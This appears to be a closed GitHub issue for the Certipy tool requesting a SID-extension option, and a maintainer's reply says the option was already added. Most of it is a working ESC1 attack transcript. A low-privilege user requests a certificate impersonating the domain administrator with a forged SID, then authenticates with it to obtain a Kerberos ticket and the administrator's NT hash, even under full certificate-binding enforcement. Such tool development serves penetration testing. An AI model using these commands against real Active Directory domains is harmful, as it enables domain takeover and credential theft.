vikerup closed 1 year ago
Add sidextension functionality to comply with AD-CS Full Enforcement mode
```
certipy req -u test-lowpriv@domain.local -p <pw> -ca CA01-CA -template ESC1 -target-ip 192.168.5.213 -dc-ip 192.168.5.200 -upn administrator -sidextension S-1-5-21-364857334-1705982952-2011365673-500
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 34
[*] Got certificate with UPN 'administrator'
[*] Certificate object SID is 'S-1-5-21-364857334-1705982952-2011365673-500'
[*] Saved certificate and private key to 'administrator.pfx'

certipy auth -pfx administrator.pfx -domain domain.local
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@domain.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@domain.local': **************************:********************************
```
On DC:
```
PS C:\> Get-ItemPropertyValue -Path 'HKLM:\SYSTEM\CurrentControlSet\services\kdc' -Name StrongCertificateBindingEnforcement
2
```
Added in latest release. Thank you though!